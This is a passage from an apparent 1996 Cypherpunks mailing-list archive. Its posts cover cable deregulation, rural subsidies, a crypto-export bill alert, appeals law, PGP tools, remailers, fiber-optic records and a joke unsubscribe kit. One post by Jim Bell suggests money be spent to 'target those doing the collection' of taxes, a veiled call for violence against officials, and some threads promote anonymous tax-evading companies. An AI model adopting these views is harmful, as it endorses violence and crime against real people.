access" by granting franchises for universal connections and forcing cable
companies to provide service to uneconomical areas. The result is that most
community cable systems are very limited, with a decaying infrastructure
and heavy price regulation. (I should remind readers that a "Datification"
program also implies rate regulation, endless hearings before rate
increases are granted, and so forth. Before deregulation of several
industries, this was how things happened. In cable t.v., it still happens
this way.)

A consequence is that many customers leapfrog right over local cable and go
directly for satellite dishes. While the local community cable systems and
their government partners could (and did) keep out other cable competitors,
this became less and less possible with satellite dishes. Zoning laws were
used to limit BUDs (Big Ugly Dishes, the big 8-foot and larger C-band
dishes). But as the Ku-band dishes (mentioned favorably in my 1988 Crypto
Anarchist Manifesto, interestingly enough) became available, even the most
restrictive zoning ordinances became unenforceable....dishes could be in
attics, on balconies, even covered with fake boulders!

The cable companies and "community access" adovcates are having conniption fits.

(This is having yet another interesting side effect: the wealthy who can
afford digital DSS dishes are suddenly very uninterested in local cable
problems, and the impetus for improvement is lost. Obviously the "poor" are
then left with a decaying, outmoded infrastructure. Even as a Darwinian, I
have to feel for them. They got sold a bill of goods, about how awarding
"the franchise" to TCI or Sonic or Galactronic Cable would result in
"universal access," and now they're stuck.)

In my own case, I skipped cable and installed a DSS dish...150 or more
channels, at least 20 movies on at any given time (not even counting the
Pay Per View movies, of which there are at least 30-40), financial news,
CNN, etc. Plus, a digital output connector for (Real Soon Now, they claim)
a PageSat-type Usenet and Web page feed, using phone links for the back
link. I submit this as an example of where the free market is providing a
better solution than "community access cable" did. In fact, the
socialization of cable held cable back.

I don't want "Rural Datification" when there is no compelling need, and a
lot of free market alternatives emerging. I doubt many farmers or Montana
cabin dwellers want it either.

--Tim

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Wed, 15 May 1996 18:32:10 +0800
To: cypherpunks@toad.com
Subject: Re: Edited Edupage, 9 May 1996
Message-ID: <9605150233.AA20633@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


On 14 May 96 at 10:57, Doug Hughes wrote:

> I wouldn't normally respond to such an offtopic post, but this post
> is so egregious I couldn't let it pass. 

You should have... 

> Who says they make a choice
> to live in rural areas? 

Why? were they lobotomized?

> Do they also choose not to have enough money
> to pay for shoes?

You got to choose to do what is needed to live a better life.  And 
most of them ain't doing what it takes.

> So, because they live in a poor district they are
> not entitled to the same level of education as a rich city suburb? 
> The illiteracy rate in Alabama is 40%! This is just plain sick!

When I was a kid, everything that had characters printed on it was 
readable.  Who is *preventing* them from reading?

> But the statement that we shouldn't subsidize
> rural customers because they CHOOSE to live there (even though some
> are poor and can't afford to live anywhere else) is just plain
> fallacious.
Please, substantiate your claims with in-context arguments.

> Just because you choose to live in the city does not
> mean people always choose to live where they live.
Who cast their feet in concrete blocks?


> Education is one
> thing (perhaps the only thing) that deserves to be subsidized in
> this country. 
I think that it should not be subsidized.
If you feel like subsidising education, then by all means, do it.  
But why should you stick a gun in my back to do the same?  What if I 
do not want to do the same as you?

> the tone of
> the above message is callous, besides being wrong.
In *my* opinion, it is right on the money.  But if you can stand 
reality, then I understand why you rant...

BTW, I do not understand the "logics" that want to bring everybody 
down because some individuals are down.  This is a system that punish 
achievement for being achievement and value meekness for itself.
A total, anti-life aberration.


JFA
The damn collectivists, thoses with the psycho-epistomology of a 
leech and lamprey, be absolutely damned!

 DePompadour, Societe d'Importation Ltee  
 Limoges porcelain, Silverware and mouth blown crystal glasses

 JFA Technologies, R&D consultants.
 Physists, technologists and engineers.

 PGP keys at: http://w3.citenet.net/users/jf_avon
 ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891 
 
 Unsollicited commercial e-mail will be proofread at US165 $/h
 Any sender of such material will be considered as to have ac-
 cepted the above mentionned terms.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blanc <blancw@accessone.com>
Date: Wed, 15 May 1996 19:10:14 +0800
To: "cypherpunks@toad.com>
Subject: RE: Why does the state still stand:
Message-ID: <01BB41E0.DE17C4C0@blancw.accessone.com>
MIME-Version: 1.0
Content-Type: text/plain


From: 	Hal [on the idea of companies operating fully anonymously]

It might be interesting to make a list of all the problems people can
think of why this idea won't work, paired with proposed solutions and
workarounds - sort of a mini FAQ for this important (some might say
ultimate) cypherpunk model.
.....................................................................

I think this is a much needed discussion  - in particular as it comes at a time when Uni is is "somewhat disconcerted" at the defeatist attitude of some cypherpunks and since TCMay is getting ready to read us the Cypherpunks Bill of Rights regarding the subsidizatoin of other's people's cyber existence (heh). 

3 problems which immediately come to mind:

.  What if someone, hired on one occasion but fired at another, decides in anger to "turn coat" and report everyone to the IRS (or other fine government agency)?

.  What if a company does not pay as expected - other than adopting Assassination Politics, what method could an employee use towards getting their expected remuneration for work done?

.  Wouldn't everyone need to have two jobs (or source of regularly accepted cash), in order to be able to pay for services where suppliers do not accept virtual cash transactions? (TCM has mentioned before about the need to pay for some things in tiny quantities - like quarters for a phone call, etc.)


     ..
Blanc




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Voters Telecommunications Watch <shabbir@vtw.org>
Date: Wed, 15 May 1996 19:00:39 +0800
To: cypherpunks@toad.com
Subject: (ALERT) Senators who introduce new crypto bill need support (5/14/96)
Message-ID: <199605150201.WAA20600@panix3.panix.com>
MIME-Version: 1.0
Content-Type: text/plain


========================================================================

		Campaign for Secure Communications Online
	               	     May 13, 1996

               BI-PARTISAN SENATORS INTRODUCE NEW CRYPTO BILL
                  S.1726 PROMISES TO FREE ENCRYPTION FROM
                     COLD WAR REGULATORY STRANGLEHOLD

      Please widely redistribute this document with this banner intact
			until June 15, 1996

________________________________________________________________________
CONTENTS
	The Latest News
	What You Can Do Now
	Crypto Factoid
	Chronology of Crypto Export Liberalization Bill
	For More Information

________________________________________________________________________
THE LATEST NEWS

In an effort to improve privacy and security on the Internet, a bi-partisan
group of legislators recently introduced a bill to encourage the widespread
availability of strong, easy-to-use encryption technologies.  The bill,
known as the Promotion of Commerce Online in the Digital Era (Pro-CODE) act
of 1996 (S. 1726), would relax Cold War era export controls which have
constrained the development and use of strong privacy and security technologies.

Encryption is one of the technologies that will allow us to visualize a secure
Internet, an Internet useful for conducting all sorts of private business
from communicating with one's doctor, loved one, or spouse, to checking
one's bank balance.

S.1726 is sponsored by Senators Burns (R-MT), Leahy (D-VT), Pressler (R-SD),
Wyden (D-OR), Ashcroft (R-MO), Dole (R-KS), Faircloth (R-NC), McCain (R-AZ),
and Murray (D-WA).

The Pro-CODE Act resolves to:

1.  Allow for the *unrestricted* export of "mass-market" or "public-domain"
    encryption programs, including such products as Pretty  Good Privacy and
    popular World Wide Web browsers.

2.  Requires the Secretary of Commerce to allow the less restricted export
    of other encryption technologies if products of similar strength are
    generally available outside the United States, roughly up to DES
    strength.

3.  Prohibits the federal government from imposing mandatory key-escrow
    encryption policies on the domestic market and limiting the authority
    of the Secretary of Commerce to set standards for encryption products. 

A copy of the legislation can be found at each of the WWW sites listed at
the bottom in the "For More Information" Section.

________________________________________________________________________
WHAT YOU CAN DO NOW

As more and more people come online, the need for - and lack of -
strong privacy and security is becoming increasingly critical.  This
legislation represents an important step towards ensuring that the
Internet develops into a secure, trusted medium for political,
commercial, and private speech.

The co-sponsors of S. 1726 have taken a political risk and are challenging
the White House, the NSA (National Security Agency, and the FBI (Federal
Bureau of Investigation) in a policy battle to protect your privacy. They
need your support.

Please familiarize yourself with the bill (pointers to background
information are listed below), and then take a moment to call, write, or
fax the sponsors of the bill and thank them for their leadership on this
issue.

1. Call/Fax/Email Senate sponsors and thank them

      P ST Name and Address           Phone           Fax
      = == ========================   ==============  ==============
      R MT Burns, Conrad R.           1-202-224-2644  1-202-224-8594
	   conrad_burns@burns.senate.gov
      D VT Leahy, Patrick J.          1-202-224-4242  1-202-224-3595
            senator_leahy@leahy.senate.gov
      R SD Pressler, Larry            1-202-224-5842  1-202-224-1259
            larry_pressler@pressler.senate.gov
      D OR Wyden, Ron                 1-202-224-5244  1-202-228-2717
      R MO Ashcroft, John             1-202-224-6154  na
	   john_ashcroft@ashcroft.senate.gov
      R KS Dole, Robert               1-202-224-6521  1-202-228-1245
      R NC Faircloth, D. M.           1-202-224-3154  1-202-224-7406
	   senator@faircloth.senate.gov
      R AZ McCain, John               1-202-224-2235  1-202-224-2862
	   senator_mccain@mccain.senate.gov
      D WA Murray, Patty              1-202-224-2621  1-202-224-0238
	   senator_murray@murray.senate.gov

2. Use sample communication

   SAMPLE PHONE CALL
	You:<ring ring>
	Sen:Hello, Senator Mojo's office!
	You:Hi, I'd like to thank the Senator for helping to introduce
	    legislation to lift the export controls on encryption.  I won't
	    use Clipper and don't think there's enough strong encryption on
	    the Internet to protect my messages.

	    Strong, non-Clipper encryption is needed to secure
	    communications with my doctor, bank, spouse, and attorney.

	Sen:Ok, thanks!<click>

3. Let VTW know what sort of response you got

   Just drop us a line at vtw@vtw.org and let us know how your phone
   call went!

4. Forward this to your friends and colleagues.  Unlike the debate over
   free speech, many netizens still do not know much about the issues of
   security and privacy on the Internet.  Take the time to explain to
   a friend why security on the Internet is important.

________________________________________________________________________
CRYPTO FACTOID

According to a 1993 study of encryption products worldwide, there are
193 products in 18 countries overseas that are sold with DES-strength
encryption built into them.

American companies and American programmers are today restricted from
selling products with DES-strength encryption to the overseas market,
or even distributing them domestically on the Internet.

It is becoming extremely difficult for American companies to compete
in the global market against competitors who do not labor under such
restrictions.

Source:
Joint study with Dr. Lance Hoffman, Trusted Information Systems
(http://www.tis.com), and the Software Publishers Association
(http://www.spa.org).  Study updated December 1995 and is available at
http://www.tis.com/crypto/survey.html.

________________________________________________________________________
CHRONOLOGY OF THE 1996 CRYPTO BILLS

5/2/96
Bi-partisan group of Senators introduce Pro-CODE Act, which would free
public-domain encryption software (such as PGP) for export, free much
commercial encryption for export, and reduce the government's ability to
push Clipper proposals down the throats of an unwilling public.  Original
sponsors include: Senators Burns (R-MT), Dole (R-KS), Faircloth (R-NC),
Leahy (D-VT), Murray (D-WA), Pressler (R-SD), and Wyden (D-OR).

3/5/96
Sen. Leahy (D-VT) and Rep. Goodlatte (R-VA) announce encryption bills
(S.1587/H.R.3011) that significantly relax export restrictions on products
with encryption functionality in them, as well as free public domain software
such as PGP (Pretty Good Privacy).

________________________________________________________________________
FOR MORE INFORMATION

There are many excellent resources online to get up to speed on crypto
including the following WWW sites:

    www.privacy.org          www.crypto.com          www.eff.org    
    www.cdt.org              www.epic.org            www.vtw.org

Please visit them often.

Several organizations are working hard to support your right to have access
to strong, effective encryption.  We have all collaborated on this alert,
funneling it through a single editor.  Please address any press queries
DIRECTLY to the organizations directly.  The editors *do not* speak for
the coalition as a whole.  Here is an alphabetical list of the coalition
members:

American Civil Liberties Union		Center for Democracy and Technology
Computer Professionals for		Electronic Frontier Foundation
   Social Responsibility		HotWired / Wired Magazine
Electronic Privacy Information
   Center
People for the American Way		*Voters Telecommunications Watch

*Editors
________________________________________________________________________
End alert
========================================================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 15 May 1996 19:14:05 +0800
To: Hal <jamesd@echeque.com
Subject: Re:  Why does the state still stand:
Message-ID: <199605150503.WAA23902@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:35 PM 5/14/96 -0700, Hal wrote:

>I think the intention then is to create "fully anonymous" companies.
>These would be organizations whose principals and employees are known
>only by pseudonyms, even to each other.  Their only contact is
>electronic, via an anonymous network.  And the employees are paid in
>anonymous ecash, which they don't pay taxes on since it is unreported
>income.
>
>These companies produce products or services which they offer for sale
>across the net.  They accept payment in ecash, either from end users or
>from other companies.
>
>Such companies would be illegal, with everyone involved subject to
>criminal penalties for tax evasion (and no doubt a myriad of other
>violations).  But because the anonymity is protected cryptographically,
>the government is helpless to learn the true identities of anyone
>involved.  The companies continue to successfully sell their products
>and services, advertising and recruiting openly from anonymous sources,
>and there is nothing the government can do about it.

The goal, obviously, is to make the cost of collection of $1 in taxes 
sufficiently expensive  so that they can't do it economically.  But let me 
draw an analogy:  The easiest form of shooting is paper target practice:  
The target is fixed.  More difficult is trap and skeet, where the target 
moves.  More difficult still is hunting, where the target (animals) is at 
least somewhat intelligent and usually very mobile, as well as camouflaged.  
This is analogous to encryption.  But the most difficult form of shooting is 
war, in which the "target" can shoot back.

If a computer model could be constructed of it, I think you'd find that the 
most effective way to avoid taxation is to invest money to target those 
doing the collection.  In fact, I'll go so far as to say that it would 
probably cost less than 10 cents to prevent the collection of $1 worth of 
tax, and probably closer to a penny.  Any analysis of the destruction of the 
state is incomplete without considering such a scenario.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joseph M. Reagle Jr." <reagle@mit.edu>
Date: Wed, 15 May 1996 18:51:47 +0800
To: Michael Froomkin <froomkin@law.miami.edu>
Subject: Re: (legal) Re: CDA Dispatch #10: Last Day in Court
Message-ID: <9605150217.AA26984@rpcp.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


At 06:06 PM 5/14/96 -0400, you wrote:

>You can appeal directly on the merits.  And you do so.  The higher court 
>decides all questions of law de novo (ie pays no deference ot tyhe 
>decision of the court below beyond whatever persuasive power it may 
>have), but must accept the factual record as presented ("found") by the 
>court below.  Thus the importance of the trial testimony at this stage.

        Ok, thank you for clarifying that. One question regarding the "de
novo," if a lower court decides to restrict its ruling to a specific aspect
of the case ("indecency") can the higher court broaden the scope of its
ruling, or must its ruling be with specific regards to the scope of the
lower court. (I don't know if the appeal can be on the basis of the scope.)

BTW: This is what a lawyer/professor was able to tell me. As you can see I
was thinking of a garbled version of a jury trial:


I'm not familiar with the case, so I cannot speak to its specifics, 
however here is the general concept of appeals in the U.S. Courts:  At 
the trial of any case there are two categories of issues to be 
resolved--those called "factual" issues and those called "legal" issues.  
Only legal issues are subject to appeal in a higher court.

If there is a jury trial, the "facts" are what the jury decides 
(including, en route to their decision, which witnesses to believe) and 
this is called the verdict.  The verdict per se is not subject to 
appeal.  The "law" is what the judge decides, and can include matters of 
procedure as well as matters of substance.  Typically these are 
decisions about what evidence to admit, what instructions to give to the 
jury, what motions to grant or deny, etc.  All of this is subject to 
appeal.  If the appeal necessitates a new trial, the new jury starts 
over with new testimony, and reaches its own conclusion on the 
facts--but this is not really an "appeal" of the first jury's verdict.

If there is no jury at the first trial, the trial judge wears both hats, 
finding the facts and making conclusions of law--but keeping these 
decisions separate in his or her opinion.  Only the judge's conclusions 
of law in such trials are subject to appeal.
_______________________
Regards,       Men govern nothing with more difficulty than their tongues,
               and can moderate their desires more than their words. -Spinoza
Joseph  Reagle      http://farnsworth.mit.edu/~reagle/home.html
reagle@mit.edu      E0 D5 B2 05 B6 12 DA 65  BE 4D E3 C1 6A 66 25 4E





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Michael E. Carboy" <carboy@carboy.com>
Date: Wed, 15 May 1996 20:54:40 +0800
To: Cypherpunks@toad.com
Subject: PGPShell & Eudora
Message-ID: <2.2.32.19960515052506.00683f54@mail.hooked.net>
MIME-Version: 1.0
Content-Type: text/plain




While trying to solve a corrupted clearsig problem with Eudora 2.2 and
PGPShell, I noticed comments in the c-punks archives on this same problem.
I wanted to pass on that Aegis Research's PGPShell "Beta4" version solves
the problem and does "preprocess" the message before signing so that Eudora
won't wreck it.  The shell can be downloaded at  http://aegisrc.com.  It is
self-extracting and, if installed in your existing PGPShell directory will
create a subdirectory named "Pretty~1" (no, I am not kidding) and then
install the new .exe there.

Regards,
MEC


Michael E. Carboy
carboy@hooked.net
carboy@carboy.com


Key fingerprint =  C9 E9 79 12 43 76 A2 DB  1A 72 FD 04 F2 03 6F 8A 
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAzDwxdIAAAEEAMmDaOXoZczvK4R7vH7ql+0sY/oHyqdtsjuOG8jbObnFjh2N
jh3TAxyXGb83xmsm6Eb6muXf6oZJdTIzO7UuSwKh+afLg6un+LU7S/VTFTUf4QNq
T1e2jZxcr33SFUxiKN7q83GkZhHyY1EeM/O8pGX+JhMANMv7gf9JSEYWhfvhAAUT
tCVNaWNoYWVsIEUuIENhcmJveSA8Y2FyYm95QGhvb2tlZC5uZXQ+iQCVAwUQMPDG
Lv9JSEYWhfvhAQF2VQQAqMj60pWt3+jZow8q/DFiM9Jw73rii2deJwfdju9vGWgU
S6Se5TegVYlti8mWLF+mRSldEnRIKZs7mycW9YlVmfxa+uM2sTceoDIACkZy1MWF
ULLeIzFDreR2YZLAVMQ4ToWTkRS2T+/jM8RQEMakPCYDIKBzCIuRQ7J+jmpR+Fs=
=79nx
-----END PGP PUBLIC KEY BLOCK-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Wed, 15 May 1996 19:03:26 +0800
To: Keith Henson <hkhenson@netcom.com>
Subject: Re: crosspost re remailers
In-Reply-To: <199605141901.MAA02888@netcom.netcom.com>
Message-ID: <Pine.GUL.3.93.960514222524.27098D-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 14 May 1996, Keith Henson wrote:

> was to Krup.   I can't speak for all of them--actually, I can't speak
> for *any* of them, but the ones who have said anything about the
> recent uses of the remailers do not seem unhappy.  There may be
> some discussion related to this on the cypherpunks mailing list.

Actually, there hasn't really been any discussion on cypherpunks, which I
find a little surprising. I'd have thought that a remailer going down
because of political/legal pressure would raise more of a ruckus. People
seem jaded, but I'm not sure why.

I posted a half dozen articles to comp.org.eff.talk, more to stimulate
discussion than to argue a position. We trolled up a statement from Hal
Finney to the effect that remailers might need to be restricted in order
to save them -- which I found to be rather provocative, but nobody said
anything. Anybody?

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ethridge@Onramp.NET (Allen Ethridge)
Date: Wed, 15 May 1996 17:37:02 +0800
To: cypherpunks@toad.com
Subject: Re: Nature of Rights
In-Reply-To: <adbdfc49030210049d28@[205.199.118.202]>
Message-ID: <199605142259371109420@lbj15.onramp.net>
MIME-Version: 1.0
Content-Type: text/plain


Tim May wrote:

> At 5:09 AM 5/14/96, Allen Ethridge wrote:

> >And on another thread, if rights are simply restrictions on the
> >government and not attributes (inate, even) of the individual, then they
> >are meaningless.

> I presume you're speaking about my point....

Yes.

> This is generally not the place to have long debates about the nature of
> government and of civil rights, . . .

Yes.

> . . .

> As nearly every argument in this area points out, your right to free speech
> does not mean you get to use my newspaper, nor my public address system,
> nor my computer service.

> The so-called innate or intrinsic rights ("life, liberty, and the pursuit
> of happiness") are basically bromides. Philosophical arguing points for a
> view of government as being limited in scope.

> Converting a slogan like this to assume this means government will
> guarantee jobs for all, or will provide two cars in every driveway, or
> whatever, has been fraught with problems.  Not the least of which are that
> such goals are inimical to the actual, enumerated rights.

Nice straw men, but not quite to the point.  I was thinking more along
the lines of the often overlooked 9th and 10th Amendments.  And, as you
mentioned in another post, I was discussing the way things should be,
not the way they are.


-- 
if not me, then who?
mailto:ethridge@onramp.net
http://rampages.onramp.net/~ethridge/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Wed, 15 May 1996 18:42:49 +0800
To: unicorn@schloss.li
Subject: Re: Fingerprinting annoyance
Message-ID: <01I4POL8JRWW8Y5EB6@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"unicorn@schloss.li"  "Black Unicorn" 14-MAY-1996 13:21:35.36

>All this "suck it up and get printed" talk has me somewhat disconcerted
>with the list.  Have many here not consistantly indicated that privacy is
>something that must be self assured?

	In most cases, such invasions of privacy are voluntary on the
employee's part - because he/she chose to be employed there. There are some
cases in which the employee doesn't have much other choice:

A. The employer is required by the government to collect this information. Such
requirements can be direct (laws to do this or else) or indirect (laws to do
this or not get government contracts - rather like Clinton's attempt to force
contractors to give in to all union demands by forbidding replacement workers).

B. The employer is a monopsonic or ogliosonic buyer of the services that the
employee can practically provide. While an ogliosonic or monopsonic corporation
(including a group of employers that has decided to all follow one policy on
such cases) isn't a full-scale government, it's still got enough power to
qualify for limits in my book.

C. The employer is a government, and thus shouldn't be allowed to go beyond
the minimal necessary intrusion to do its job of protecting individual choices.

>I think that unless proper means are taken to safeguard information,
>social security number, license plates, and fingerprint records included,
>that the individual is perfectly within rights to take his or her own
>safeguarding initiatives.

	Social security numbers and license plates are forced upon one by
a government. One did not choose to have these pieces of identification; these
are therefore exceptions to the above rule.

>Where those methods are not intended to simply evade prosecution, but
>rather to foil extreme recordkeeping, I believe them legitimate.

	I would hope that you would also count evading illegitimate prosecution
(drug laws, censorship laws, et al) as legitimate uses of them. I would.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 15 May 1996 19:52:42 +0800
To: cypherpunks@toad.com
Subject: Past one terabit/second on fiber
Message-ID: <199605150618.XAA28824@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


In the April 1996 issue of Fiber Optic Product news, there is an article on 
a Lucent Technologies (formerly Bell Labs...no relation...sigh...) product 
which wavelength-multiplexes quantity 8, 2.5 Gb/second signals on a single 
fiber, for a total of 20 Gb/sec.  This is a real, purchaseable system.  On 
the same page is a somewhat more experimental system, done by Corning and 
Siemens, in which eight channels at 10 Gb/sec each were transmitted on a 
single Corning fiber.

"Wow", I said.  Far faster than the 2.5 Gb/sec transmission that is 
currently fairly standard for long-haul fiber trunks. 

I wasn't prepared, however, for page 38, in an article titled "Research 
Teams Achieve 1 Trillion bits a Second."  In fact, three separate groups did 
this.  I copy the article below.

CP relevance?  Well, the justification the government uses to regulate the 
airwaves, via the FCC, is that the available bandwidth is limited, which it 
is.  But that argument has never been true with fiber, at least in theory, 
and is becoming even less true in practice.  For example, that recent flap 
over Internet-based long-distance telephone interconnects (LD companies 
don't want competition) is based on the fact that the normal providers of 
these services want to get their dime a minute rates come hell or high 
water. Sure, that's a might cheaper than it was a decade ago.   But with 
fiber transmission probably less than 1/100th the cost of older coaxial 
transmission systems, per connection, it is unclear why they're even 
continuing to meter LD phone calls.  

Even if we only consider that 20 Gb/second fiber from Lucent, that is 
equivalent to about 300,000 simultaneous voice calls.  With a standard, 
36-fiber cable, that represents 18x300,000 two-way calls, or about 4.8 
million calls.  This is probably far greater than the maximum number of 
people on LD in the US at any given time, and that's just a single cable trunk.

If we assume that the fiber cable costs $1/meter per fiber, and the cost of 
trenching, burial, and interconnects raise this to $10/meter/fiber, and if 
we generously assume that the average LD call goes 3000 miles (5,000,000m), 
that call occupies 1/150,000th of a $50 million fiber for a few minutes.  If 
we suppose that the fiber has to gross $100,000,000 per year to pay for 
itself, and even if it's only operating at an average 10% load level(both 
assumptions are pessimistic, that only works out to a cost of 1.3 cents per 
minute per call.  That's why these LD phone companies are so scared:  If we 
can transmit Internet on fiber, that fiber can accept this extra traffic at 
very low marginal cost.


Part of article follows:

"Research teams Achieve 1 Trillion bits a second"

Debra Norman, Editor in Chief.

Three research teams achieved their ultimate goal by sending the most 
information possible over optical fiber. 

The scientists, including a 12-member group from AT&T Research, Bell 
Laboratories, Lucent Technologies, reported in post-deadline papers at the 
Optical Fiber Conference held recently in San Jose, Calif., that they had 
sent one terabit of information over non-zero-dispersion fiber in a second's 
time.  In short, it is similar to transmitting the contents of 1,000 copies 
of a 30-volume encyclopedia in one second.  The researchers had not expected 
to send that much data until at least the year 2000.

In the paper, the group described a 1 Tb/s transmission experiment that 
utilized WDM [wavelength division multiplexing] and polarization multiplexing.

The outputs of 25 lasers were multiplexed using star couplers and waveguide 
grating routers.  The wavelengths ranged from 1542 nm (channel 1) to 1561.2 
nm (channel 25) with 100 GHz channel spacing.  All lasers were 
external-cavity lasers except for channel 16, which used a DFB laser.  Four 
of the laser outputs (channels 10,11,17, and 25) were amplified and filtered 
before multiplexing.  The multiplexed wavelengths were then amplified and 
propagatedthrough an polarization beamsplitter to align al the 
polarizations.  Polarization controllers at the output of each laser allowed 
independent polarization control for each source.

The 25 co-polarized wavelengths were split by a 3-dB coupler, separatedly 
modulated by LiNbO3 Mach-Zehnder modulators, and then recombined with 
orthogonal polarizations in a PBS.  The modulators have a small-signal 
bandwidth of 18 GHz and built-in polarizers.  The 20 Gb/s NRZ drive signals 
were produced by electronically multiplexing two 10-Gb/s 215-1 pseudorandom 
bit streams using a commercial GaAs multiplexer.

Two other groups from Japan, Fujitsu and Nippon Telephone and Telegraph Co., 
also submitted papers reporting that they reached the terabit mark.  All 
three groups achieved the record with different experiments.  

Scientists from NTT demonstrated 100 Gb/s x 10 channel (1 Tb/s), error-free 
transmission of all the 10 channels over a 40 km dispersion-shifted fiber 
using a low-noise single supercontinuum WDM source fitted with a newly 
developed arrayed-waveguide grating demultiplexer/multiplexer.  By fully 
utilizing the super-broad bandwidth of the SC spectra over 200 nm, up to 5 
Tb/s would be possible.

Fujitsu researchers achieved 1.1 Tb/s (55 wavelengths x 20 Gb/s) WDM 
transmission over 150 km of 1.3 mm [?] zero-dispersion singlemode fiber 
using preemphasis and dispersion compensating fiber with a negative 
dispersion slope.  BER [bit error rate] degradation was not observed in any 
channel, even without channel-by-channel dispersion adjustment.

[end of quoted portion]

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Del Torto <ddt@lsd.com>
Date: Wed, 15 May 1996 22:22:15 +0800
To: <list-managers@greatcircle.com>
Subject: [NOISE] Unsub Kit
Message-ID: <v03006e0dadbf2a367294@[192.187.167.52]>
MIME-Version: 1.0
Content-Type: text/plain


Grin-noise of the Day. Typos are (sic) as found. Reply-noise to me, not the
list (please). Don't forget to rinse and repeat.

   dave


................................. cut here .................................

From: KJ Fisher <FISHERKJ@SNYDELAB.DELHI.EDU>

> someonme get me off this fucking mailing list

First, ask your Internet Provider to mail you an Unsubscribing Kit.  Then
follow these directions.

The kit will most likely be the standard no-fault type. Depending on
requirements, System A and/or System B can be used. When operating System A,
depress lever and a plastic dalkron unsubscriber will be dispensed through
the slot immediately underneath. When you have fastened the adhesive lip,
attach connection marked by the large "X" outlet hose. Twist the silver-
coloured ring one inch below the connection point until you feel it lock.

The kit is now ready for use. The Cin-Eliminator is activated by the small
switch on the lip. When securing, twist the ring back to its initial
condition, so that the two orange lines meet. Disconnect. Place the dalkron
unsubscriber in the vacuum receptacle to the rear. Activate by pressing the
blue button.

The controls for System B are located on the opposite side. The red release
switch places the Cin-Eliminator into position; it can be adjusted manually
up or down by pressing the blue manual release button. The opening is self-
adjusting. To secure after use, press the green button, which simultaneously
activates the evaporator and returns the Cin-Eliminator to its storage
position.

You may log off if the green exit light is on over the evaporator . If the
red light is illuminated, one of the Cin-Eliminator requirements has not been
properly implemented. Press the "List Guy" call button on the right of the
evaporator . He will secure all facilities from his control panel.

To use the Auto-Unsub, first undress and place all your clothes in the
clothes rack. Put on the velcro slippers located in the cabinet immediately
below. Enter the shower, taking the entire kit with you. On the control panel
to your upper right upon entering you will see a "Shower seal" button. Press
to activate. A green light will then be illuminated immediately below. On the
intensity knob, select the desired setting. Now depress the Auto-Unsub
activation lever. Bathe normally.

The Auto-Unsub will automatically go off after three minutes unless you
activate the "Manual off" override switch by flipping it up. When you are
ready to leave, press the blue "Shower seal" release button. The door will
open and you may leave. Please remove the velcro slippers and place them in
their container.

If you prefer the ultrasonic log-off mode, press the indicated blue button.
When the twin panels open, pull forward by rings A & B. The knob to the left,
just below the blue light, has three settings, low, medium or high. For
normal use, the medium setting is suggested.

After these settings have been made, you can activate the device by switching
to the "ON" position the clearly marked red switch. If during the
unsubscribing operation, you wish to change the settings, place the "manual
off" override switch in the "OFF" position. You may now make the change and
repeat the cycle. When the green exit light goes on, you may log off and have
lunch. Please close the door behind you.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer@c2.org
Date: Wed, 15 May 1996 19:31:47 +0800
To: ethridge@Onramp.NET (Allen Ethridge)
Subject: Re: PRZ /PGP
In-Reply-To: <19960514182933135274@central28.onramp.net>
Message-ID: <199605150636.XAA08535@atropos.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> Freeware authors are regularly criticized for delays, at least
> on the Mac newsgroups.  And nearly everybody in software development
> misses deadlines.  Where I've worked, us low level grunts (the guys and

	I'm sorry, but if you're getting paid for work, then it should
be delivered on time (or close to on time). Whether or not the work
you getting paid to do is going to be distributed for free or not is
beside the point.


-- 
Sameer Parekh					Voice:   510-601-9777x3
Community ConneXion, Inc.			FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.net/ (or login as "guest")		sameer@c2.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer@c2.org
Date: Wed, 15 May 1996 19:09:35 +0800
To: llurch@networking.stanford.edu (Rich Graves)
Subject: Re: crosspost re remailers
In-Reply-To: <Pine.GUL.3.93.960514222524.27098D-100000@Networking.Stanford.EDU>
Message-ID: <199605150639.XAA08616@atropos.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> anything. Anybody?
> 

	I'm still waiting for my subpoena. I feel like a failure
without it.

-- 
Sameer Parekh					Voice:   510-601-9777x3
